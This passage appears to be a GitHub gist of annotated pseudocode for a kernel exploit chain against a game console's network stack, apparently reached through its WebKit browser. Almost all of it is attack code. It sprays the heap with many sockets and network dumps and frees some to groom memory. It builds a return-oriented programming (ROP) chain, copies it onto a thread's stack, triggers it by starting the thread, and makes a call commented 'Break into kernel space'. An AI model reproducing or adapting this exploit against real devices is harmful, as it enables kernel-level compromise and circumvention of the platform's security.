| 0x00(x_stack + 0x000084E8) = sceNetSocket(x_stack + 0x00010478, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084EC) = sceNetSocket(x_stack + 0x00010480, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084F0) = sceNetSocket(x_stack + 0x00010488, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084F4) = sceNetSocket(x_stack + 0x00010490, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084F8) = sceNetSocket(x_stack + 0x00010498, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000084FC) = sceNetSocket(x_stack + 0x000104A0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008500) = sceNetSocket(x_stack + 0x000104A8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008504) = sceNetSocket(x_stack + 0x000104B0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008508) = sceNetSocket(x_stack + 0x000104B8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x0000850C) = sceNetSocket(x_stack + 0x000104C0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008510) = sceNetSocket(x_stack + 0x000104C8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008514) = sceNetSocket(x_stack + 0x000104D0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008518) = sceNetSocket(x_stack + 0x000104D8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x0000851C) = sceNetSocket(x_stack + 0x000104E0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008520) = sceNetSocket(x_stack + 0x000104E8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008524) = sceNetSocket(x_stack + 0x000104F0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008528) = sceNetSocket(x_stack + 0x000104F8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x0000852C) = sceNetSocket(x_stack + 0x00010500, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008530) = sceNetSocket(x_stack + 0x00010508, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008534) = sceNetSocket(x_stack + 0x00010510, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008538) = sceNetSocket(x_stack + 0x00010518, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x0000853C) = sceNetSocket(x_stack + 0x00010520, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008540) = sceNetSocket(x_stack + 0x00010528, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008544) = sceNetSocket(x_stack + 0x00010530, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008548) = sceNetSocket(x_stack + 0x00010538, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x0000854C) = sceNetSocket(x_stack + 0x00010540, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008550) = sceNetSocket(x_stack + 0x00010548, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008554) = sceNetSocket(x_stack + 0x00010550, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008558) = sceNetSocket(x_stack + 0x00010558, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x0000855C) = sceNetSocket(x_stack + 0x00010560, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008560) = sceNetSocket(x_stack + 0x00010568, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008564) = sceNetSocket(x_stack + 0x00010570, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008568) = sceNetSocket(x_stack + 0x00010578, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x0000856C) = sceNetSocket(x_stack + 0x00010580, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008570) = sceNetSocket(x_stack + 0x00010588, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008574) = sceNetSocket(x_stack + 0x00010590, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008578) = sceNetSocket(x_stack + 0x00010598, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x0000857C) = sceNetSocket(x_stack + 0x000105A0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008580) = sceNetSocket(x_stack + 0x000105A8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008584) = sceNetSocket(x_stack + 0x000105B0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008588) = sceNetSocket(x_stack + 0x000105B8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x0000858C) = sceNetSocket(x_stack + 0x000105C0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008590) = sceNetSocket(x_stack + 0x000105C8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008594) = sceNetSocket(x_stack + 0x000105D0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x00008598) = sceNetSocket(x_stack + 0x000105D8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x0000859C) = sceNetSocket(x_stack + 0x000105E0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000085A0) = sceNetSocket(x_stack + 0x000105E8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000085A4) = sceNetSocket(x_stack + 0x000105F0, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000085A8) = sceNetSocket(x_stack + 0x000105F8, 0x00000002, 0x00000001, 0x00000000); | |
| 0x00(x_stack + 0x000085AC) = sceNetSocket(x_stack + 0x00010600, 0x00000002, 0x00000001, 0x00000000); | |
| // sceNetSocket("sss", AF_INET, SOCK_STREAM, 0); | |
| 0x00(x_stack + 0x000085B8) = sceNetSocket(x_stack + 0x00010608, 0x00000002, 0x00000001, 0x00000000); | |
| // sceNetSocket("tst", AF_INET, 0x7, 0); | |
| 0x00(x_stack + 0x000085C4) = sceNetSocket(x_stack + 0x00010614, 0x00000002, 0x00000007, 0x00000000); | |
| // Setup "mhm" ROP | |
| 0x00(x_stack + 0x00008708) = 0x008DD9B5 | |
| 0x00(x_stack + 0x0000870C) = 0x000085C4 | |
| 0x00(x_stack + 0x00008710) = 0x10007300 | |
| 0x00(x_stack + 0x00008714) = 0x00000000 | |
| 0x00(x_stack + 0x00008718) = 0x00000000 | |
| 0x00(x_stack + 0x0000871C) = 0x00009F90 | |
| 0x00(x_stack + 0x00008720) = 0x00000000 | |
| 0x00(x_stack + 0x00008724) = 0x000FCDBB | |
| 0x00(x_stack + 0x00008728) = 0x00008810 | |
| 0x00(x_stack + 0x0000872C) = 0x000059A9 | |
| 0x00(x_stack + 0x00008730) = 0x00000000 | |
| 0x00(x_stack + 0x00008734) = 0x00000519 | |
| /* | |
| "mhm" ROP | |
| // Issue an IOCtl to "tst" FD | |
| int ioctl_res = sceNetSyscallIoctl(x_stack + 0x000085C4, 0x10007300, 0x00000000); | |
| // Store IOCtl result | |
| 0x00(x_stack + 0x00008810) = ioctl_res; | |
| // Deadlock | |
| sceWebkit_519(); | |
| */ | |
| // Copy "mhm" ROP chain into "mhm" thread's stack | |
| memcpy(0x00(x_stack + 0x000086FC), x_stack + 0x00008708, 0x00000100); | |
| // Set stack pointer | |
| 0x00(x_stack + 0x00008830) = x_stack + 0x000086FC; | |
| // Set PC | |
| 0x00(x_stack + 0x00008834) = 0x000C048B; // POP {PC} | |
| // sceNetSocket("tmp", AF_INET, SOCK_STREAM, 0); | |
| 0x00(x_stack + 0x000085D0) = sceNetSocket(x_stack + 0x00010620, 0x00000002, 0x00000001, 0x00000000); | |
| // Create several net dumps | |
| // sceNetDumpCreate("ddd", 0x00000F00, 0x00000000); | |
| 0x00(x_stack + 0x000085F4) = sceNetDumpCreate(x_stack + 0x0001062C, 0x00000F00, 0x00000000); | |
| 0x00(x_stack + 0x000085F8) = sceNetDumpCreate(x_stack + 0x00010638, 0x00000F00, 0x00000000); | |
| 0x00(x_stack + 0x000085FC) = sceNetDumpCreate(x_stack + 0x00010644, 0x00000F00, 0x00000000); | |
| 0x00(x_stack + 0x00008600) = sceNetDumpCreate(x_stack + 0x00010650, 0x00000F00, 0x00000000); | |
| 0x00(x_stack + 0x00008604) = sceNetDumpCreate(x_stack + 0x0001065C, 0x00000F00, 0x00000000); | |
| 0x00(x_stack + 0x00008608) = sceNetDumpCreate(x_stack + 0x00010668, 0x00000F00, 0x00000000); | |
| 0x00(x_stack + 0x0000860C) = sceNetDumpCreate(x_stack + 0x00010674, 0x00000F00, 0x00000000); | |
| 0x00(x_stack + 0x00008610) = sceNetDumpCreate(x_stack + 0x00010680, 0x00000F00, 0x00000000); | |
| 0x00(x_stack + 0x00008614) = sceNetDumpCreate(x_stack + 0x0001068C, 0x00000F00, 0x00000000); | |
| 0x00(x_stack + 0x000085E8) = sceNetDumpCreate(x_stack + 0x00010698, 0x00000F00, 0x00000000); | |
| 0x00(x_stack + 0x000085DC) = sceNetDumpCreate(x_stack + 0x000106A4, 0x00001000, 0x00000000); | |
| // Destroy some dumps | |
| sceNetDumpDestroy(x_stack + 0x000085F4); | |
| sceNetDumpDestroy(x_stack + 0x000085FC); | |
| sceNetDumpDestroy(x_stack + 0x00008604); | |
| sceNetDumpDestroy(x_stack + 0x0000860C); | |
| sceNetDumpDestroy(x_stack + 0x00008614); | |
| sceNetDumpDestroy(x_stack + 0x000085E8); | |
| // Create more net dumps | |
| sceNetDumpCreate(x_stack + 0x000106B0, 0x000D0000, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000106BC, 0x000CFF00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000106C8, 0x000CFE00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000106D4, 0x000CFD00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000106E0, 0x000CFC00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000106EC, 0x000CFB00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000106F8, 0x000CFA00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010704, 0x000CF900, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010710, 0x000CF800, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x0001071C, 0x000CF700, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010728, 0x000CF600, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010734, 0x000CF500, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010740, 0x000CF400, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x0001074C, 0x000CF300, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010758, 0x000CF200, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010764, 0x000CF100, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010770, 0x000CF000, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x0001077C, 0x000CEF00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010788, 0x000CEE00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010794, 0x000CED00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000107A0, 0x000CEC00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000107AC, 0x000CEB00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000107B8, 0x000CEA00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000107C4, 0x000CE900, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000107D0, 0x000CE800, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000107DC, 0x000CE700, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000107E8, 0x000CE600, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000107F4, 0x000CE500, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010800, 0x000CE400, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x0001080C, 0x000CE300, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010818, 0x000CE200, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010824, 0x000CE100, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010830, 0x000CE000, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x0001083C, 0x000CDF00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010848, 0x000CDE00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010854, 0x000CDD00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010860, 0x000CDC00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x0001086C, 0x000CDB00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010878, 0x000CDA00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010884, 0x000CD900, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010890, 0x000CD800, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x0001089C, 0x000CD700, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000108A8, 0x000CD600, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000108B4, 0x000CD500, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000108C0, 0x000CD400, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000108CC, 0x000CD300, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000108D8, 0x000CD200, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000108E4, 0x000CD100, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000108F0, 0x000CD000, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000108FC, 0x000CCF00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010908, 0x000CCE00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010914, 0x000CCD00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010920, 0x000CCC00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x0001092C, 0x000CCB00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010938, 0x000CCA00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010944, 0x000CC900, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010950, 0x000CC800, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x0001095C, 0x000CC700, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010968, 0x000CC600, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010974, 0x000CC500, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010980, 0x000CC400, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x0001098C, 0x000CC300, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010998, 0x000CC200, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000109A4, 0x000CC100, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000109B0, 0x000CC000, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000109BC, 0x000CBF00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000109C8, 0x000CBE00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000109D4, 0x000CBD00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000109E0, 0x000CBC00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000109EC, 0x000CBB00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x000109F8, 0x000CBA00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010A04, 0x000CB900, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010A10, 0x000CB800, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010A1C, 0x000CB700, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010A28, 0x000CB600, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010A34, 0x000CB500, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010A40, 0x000CB400, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010A4C, 0x000CB300, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010A58, 0x000CB200, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010A64, 0x000CB100, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010A70, 0x000CB000, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010A7C, 0x000CAF00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010A88, 0x000CAE00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010A94, 0x000CAD00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010AA0, 0x000CAC00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010AAC, 0x000CAB00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010AB8, 0x000CAA00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010AC4, 0x000CA900, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010AD0, 0x000CA800, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010ADC, 0x000CA700, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010AE8, 0x000CA600, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010AF4, 0x000CA500, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010B00, 0x000CA400, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010B0C, 0x000CA300, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010B18, 0x000CA200, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010B24, 0x000CA100, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010B30, 0x000CA000, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010B3C, 0x000C9F00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010B48, 0x000C9E00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010B54, 0x000C9D00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010B60, 0x000C9C00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010B6C, 0x000C9B00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010B78, 0x000C9A00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010B84, 0x000C9900, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010B90, 0x000C9800, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010B9C, 0x000C9700, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010BA8, 0x000C9600, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010BB4, 0x000C9500, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010BC0, 0x000C9400, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010BCC, 0x000C9300, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010BD8, 0x000C9200, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010BE4, 0x000C9100, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010BF0, 0x000C9000, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010BFC, 0x000C8F00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010C08, 0x000C8E00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010C14, 0x000C8D00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010C20, 0x000C8C00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010C2C, 0x000C8B00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010C38, 0x000C8A00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010C44, 0x000C8900, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010C50, 0x000C8800, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010C5C, 0x000C8700, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010C68, 0x000C8600, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010C74, 0x000C8500, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010C80, 0x000C8400, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010C8C, 0x000C8300, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010C98, 0x000C8200, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010CA4, 0x000C8100, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010CB0, 0x000C8000, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010CBC, 0x000C7F00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010CC8, 0x000C7E00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010CD4, 0x000C7D00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010CE0, 0x000C7C00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010CEC, 0x000C7B00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010CF8, 0x000C7A00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010D04, 0x000C7900, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010D10, 0x000C7800, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010D1C, 0x000C7700, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010D28, 0x000C7600, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010D34, 0x000C7500, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010D40, 0x000C7400, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010D4C, 0x000C7300, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010D58, 0x000C7200, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010D64, 0x000C7100, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010D70, 0x000C7000, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010D7C, 0x000C6F00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010D88, 0x000C6E00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010D94, 0x000C6D00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010DA0, 0x000C6C00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010DAC, 0x000C6B00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010DB8, 0x000C6A00, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010DC4, 0x000C6900, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010DD0, 0x000C6800, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010DDC, 0x000C6700, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010DE8, 0x000C6600, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010DF4, 0x000C6500, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010E00, 0x000C6400, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010E0C, 0x000C6300, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010E18, 0x000C6200, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010E24, 0x000C6100, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010E30, 0x000C6000, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010E3C, 0x00001000, 0x00000000); | |
| sceNetDumpCreate(x_stack + 0x00010E48, 0x00001000, 0x00000000); | |
| // Start "mhm" thread | |
| // Thread arguments are loaded into R1 and the gadget | |
| // at the thread's entrypoint then loads register values | |
| // from it, overwritting SP and PC and triggering the | |
| // ROP chain | |
| sceKernelStartThread(thread_id, 0x0000001C, x_stack + 0x0000881C); | |
| // Delay thread | |
| sceKernelDelayThread(1500000); | |
| // Close no longer needed sockets | |
| sceNetSyscallClose(x_stack + 0x00008470); | |
| sceNetSyscallClose(x_stack + 0x00008478); | |
| sceNetSyscallClose(x_stack + 0x00008480); | |
| sceNetSyscallClose(x_stack + 0x00008488); | |
| sceNetSyscallClose(x_stack + 0x00008490); | |
| sceNetSyscallClose(x_stack + 0x00008498); | |
| sceNetSyscallClose(x_stack + 0x000084A0); | |
| sceNetSyscallClose(x_stack + 0x000084A8); | |
| sceNetSyscallClose(x_stack + 0x000084B0); | |
| sceNetSyscallClose(x_stack + 0x000084B8); | |
| sceNetSyscallClose(x_stack + 0x000084C0); | |
| sceNetSyscallClose(x_stack + 0x000084C8); | |
| sceNetSyscallClose(x_stack + 0x000084D0); | |
| sceNetSyscallClose(x_stack + 0x000084D8); | |
| sceNetSyscallClose(x_stack + 0x000084E0); | |
| sceNetSyscallClose(x_stack + 0x000084E8); | |
| sceNetSyscallClose(x_stack + 0x000084F0); | |
| sceNetSyscallClose(x_stack + 0x000084F8); | |
| sceNetSyscallClose(x_stack + 0x00008500); | |
| sceNetSyscallClose(x_stack + 0x00008508); | |
| sceNetSyscallClose(x_stack + 0x00008510); | |
| sceNetSyscallClose(x_stack + 0x00008518); | |
| sceNetSyscallClose(x_stack + 0x00008520); | |
| sceNetSyscallClose(x_stack + 0x00008528); | |
| sceNetSyscallClose(x_stack + 0x00008530); | |
| sceNetSyscallClose(x_stack + 0x00008538); | |
| sceNetSyscallClose(x_stack + 0x00008540); | |
| sceNetSyscallClose(x_stack + 0x00008548); | |
| sceNetSyscallClose(x_stack + 0x00008550); | |
| sceNetSyscallClose(x_stack + 0x00008558); | |
| sceNetSyscallClose(x_stack + 0x00008560); | |
| sceNetSyscallClose(x_stack + 0x00008568); | |
| sceNetSyscallClose(x_stack + 0x00008570); | |
| sceNetSyscallClose(x_stack + 0x00008578); | |
| sceNetSyscallClose(x_stack + 0x00008580); | |
| sceNetSyscallClose(x_stack + 0x00008588); | |
| sceNetSyscallClose(x_stack + 0x00008590); | |
| sceNetSyscallClose(x_stack + 0x00008598); | |
| sceNetSyscallClose(x_stack + 0x000085A0); | |
| sceNetSyscallClose(x_stack + 0x000085A8); | |
| sceNetSyscallClose(x_stack + 0x000085C4); | |
| // Break into kernel space | |
| sceNetSyscallControl(0x00000000, 0x30000000, x_stack + 0x00008840, 0x000000FC); | |
| // Destroy another dump | |
| sceNetDumpDestroy(x_stack + 0x000085DC); | |
| // Delay for a while | |
| sceKernelDelayThread(1000000); | |
| // Calculate a SceWebkit pointer using the ioctl | |
| // from "mhm" thread (kernel space?) | |
| r0 = 0x00(x_stack + 0x00008810) + SceWebkit_base + 0x00000575; | |
| // Unknown | |
| sceWebkit_123(); | |
| sceWebkit_CF481(); | |
| // Destroy specific dumps (constant IDs) | |
| sceNetDumpDestroy(0x00001770); | |
| sceNetDumpDestroy(0x00001771); | |
| sceNetDumpDestroy(0x00001772); | |
| sceNetDumpDestroy(0x00001773); | |
| sceNetDumpDestroy(0x00001774); | |
| sceNetDumpDestroy(0x00001775); | |
| sceNetDumpDestroy(0x00001776); | |
| sceNetDumpDestroy(0x00001777); | |
| sceNetDumpDestroy(0x00001778); | |
| sceNetDumpDestroy(0x00001779); | |
| sceNetDumpDestroy(0x0000177A); | |
| sceNetDumpDestroy(0x0000177B); | |
| sceNetDumpDestroy(0x0000177C); | |
| sceNetDumpDestroy(0x0000177D); | |
| sceNetDumpDestroy(0x0000177E); | |
| sceNetDumpDestroy(0x0000177F); | |
| sceNetDumpDestroy(0x00001780); | |
| sceNetDumpDestroy(0x00001781); | |
| sceNetDumpDestroy(0x00001782); | |
| sceNetDumpDestroy(0x00001783); | |
| sceNetDumpDestroy(0x00001784); | |
| sceNetDumpDestroy(0x00001785); | |
| sceNetDumpDestroy(0x00001786); | |
| sceNetDumpDestroy(0x00001787); | |
| sceNetDumpDestroy(0x00001788); | |
| sceNetDumpDestroy(0x00001789); | |
| sceNetDumpDestroy(0x0000178A); | |
| sceNetDumpDestroy(0x0000178B); | |
| sceNetDumpDestroy(0x0000178C); | |
| sceNetDumpDestroy(0x0000178D); | |
| sceNetDumpDestroy(0x0000178E); | |
| sceNetDumpDestroy(0x0000178F); | |
| sceNetDumpDestroy(0x00001790); | |
| // Deadlock | |
| sceWebkit_519(0x00000000); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment